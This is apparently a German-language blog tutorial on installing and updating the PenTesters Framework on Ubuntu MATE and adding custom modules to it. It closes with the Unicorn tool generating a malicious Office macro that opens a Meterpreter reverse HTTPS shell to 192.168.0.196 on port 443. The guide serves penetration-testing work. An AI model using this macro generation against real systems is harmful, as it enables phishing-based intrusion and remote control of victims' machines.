PenTesters Framework auf Ubuntu MATE installieren

Das PenTesters Framework (PTF) ist eine von David Kennedy  in der Programmiersprache Python geschriebene Anwendung, die vorrangig für Debian und Ubuntu-Systeme entwickelt wurde. Mit Hilfe dieses Werkzeuges lassen sich verschiedene Tools für Penetrationstests in Verzeichnissen zusammenfassen und aktualisieren.

Das so zusammengetragene Toolset vereinigt regelmäßig eingesetzte Werkzeuge (Module) in einer zentralen Umgebung, die sich für die eigene Nutzung erweitern lassen.

Für einen ersten Test werden wir PTF in einer virtuellen Umgebung auf einem Ubuntu-MATE-System (64 bit) installieren.

Die Installation

Die Installation gestaltet sich mittels git recht einfach. Mit folgendem Befehlen läßt sich das Framework herunterladen und installieren:

sudo su
apt-get update
apt-get install git
git clone https://github.com/trustedsec/ptf
cd ptf
./ptf

Einen Überblick verschaffen

Nach der Installation von PTF kann man das Framework mit dem Kommando exit beenden. Ab jetzt lässt sich PTF aus jedem beliebigen Verzeichnis starten.

In der aktuellen Version (derzeit 1.13.1) sind bereits 194 Module verfügbar, die sich mit dem Befehl show modules auflisten lassen. Wer bereits die verschiedenen Module aus dem Metasploit-Framework genutzt hat, wird diese Ansicht nicht fremd vorkommen.

Folgende Kategorien sind derzeit verfügbar. Die enthaltenen Werkzeuge können hier eingesehen werden:

  • av-bypass
  • code-audit
  • exploitation
  • intelligence-gathering
  • mobile-analysis
  • password-recovery
  • post-exploitation
  • powershell
  • pre-engagement
  • reporting
  • reversing
  • threat-modeling
  • tunneling
  • vulnerability-analysis
  • webshells
  • windows-tools
  • wireless

Mit dem search Befehl lassen sich verschiedene Module auffinden. So listet z.B. das Kommando seach metasploit alle Module auf, die dieses Werkzeug nutzen. Bei diesem Aufruf wird auch das Modul modules/exploitation/metasploit gefunden.

Bei meinen ersten Tests hat sich gezeigt, dass es von Vorteil ist, wenn man das Metasploit-Framework als erstes installiert. Dazu rufen wir das Modul mit dem Befehl use modules/exploitation/metasploit  auf und starten die Installation mit dem Kommando run.

Wer nur ausgewählte Module benötigt, der kann  nach dem gleichen Schema seine favorisierten Werkzeuge installieren. Die sollte, aus meiner Sicht, auch die bevorzugte Variante sein. Möchte man aber alle derzeit verfügbaren Module installieren und auf den neusten Stand bringen, so kommt der Befehl use modules install_update zum Einsatz.

Nun ist unser Ubuntu-System eine Weile damit beschäftigt, die verfügbaren Tools und dessen Abhängigkeiten herunterzuladen. Wer bereits Veil-Evasion auf einem anderen System installiert hat, wird wissen, dass dies auf Grund der vielen Abhängigkeiten (wie z.B. Wine, Python, Ruby etc.) etwas länger dauern kann. Wenn nach dem Installationspfad für Metasploit gefragt wird, ist hier /pentest/exploitation/metasploit einzutragen.

Dies gibt uns Zeit ein wenig zu erforschen, wo die einzelnen Werkzeuge auf unserem Linux-System abgelegt werden. Die Konfigurationsdaten finden wird im Installationsverzeichnis unter config. Wenn man die Datei ptf.config mit einem beliebigen Editor öffnet, wird unter der Option BASIC_INSTALL_PATH der Standartordner /pentest sichtbar. Dies lässt sich natürlich nach den eigenen Vorstellungen ändern.

PTF aktualisieren

Hier gibt es mehrere Möglichkeiten. In  der Kommandozeile lässt sich folgendes ausführen:

./ptf --update-all

Als Alternative das kann man innerhalb des Frameworks das Modul update_installed wie folgt aufrufen:

./ptf 
use modules/update_installed

System anpassen

Wer eigene Werkzeuge in PTF einbinden möchte, kann dies mit geringem Aufwand selbst erledigen. Dazu öffnet man im Installationsverzeichnis den Ordner modules. Hier befinden sich in weiteren Unterordnern (je nach Kategorie) die dazugehörigen Module. Für jedes Tools ist hier eine Datei mir Endung .py abgespeichert.

Um ein neues Werkzeug hinzuzufügen, kopiert man eine bereits bestehende .py Datei als Vorlage in ein passendes Unterverzeichnis und passt die dort festgelegten Optionen nach den eigenen Wünschen an. Die notwendigen Angaben sind selbsterklärend. Nach einem Neustart von PTF wird das neue Werkzeug heruntergeladen und nach den festgelegten Vorgaben installiert. Wer Hilfe benötigt sollte diese Anleitung befolgen.

 

Werkzeuge anwenden

Nachdem das gewünschte oder auch alle Module heruntergeladen wurden, kann man die Werkzeuge wie gewohnt von der Kommandozeile aufrufen. Dabei ist es irrelevant in welchem Verzeichnis man sich gerade befindet. Die sogenannten „Launcher“ machen es möglich.

Dies soll am Beispiel eines ausgewählten Tools nochmals kurz aufgezeigt werden. Magic Unicorn ist ein PowerShell-Angriff der Shellcode direkt im Hauptspeicher ausführt. Das Werkzeug wird wie folgt in PTF aufgerufen und installiert:

sudo su
ptf
search unicorn
use modules/post-exploitation/unicorn
run
exit
exit

Unicorn ist nun installiert und kann von einem beibiegen Verzeichnis aufgerufen werden. Der Befehl unicorn –help zeigt die derzeit verfügbaren Möglichkeiten.

Wir wollen ein MS-Office Makro mit folgenden Optionen erstellen:

  • Payload: windows/meterpreter/reverse_https
  • LHOST: 192.168.0.196
  • LPORT : 443

Dazu führen wir den folgenden Befehl in der Kommandozeile aus

unicorn windows/meterpreter/reverse_https 192.168.0.196 443 macro

Als Ergebnis werden folgenden Dateien im Verzeichnis /pentest/post-exploitation/unicorn abgelegt:

  • Powershell_attack.txt – enthält das erzeugte Makro
  • unicorn.rc – enthält die erzeugte Ressource-Dateien für das Metasploit-Framework

Schreibe einen Kommentar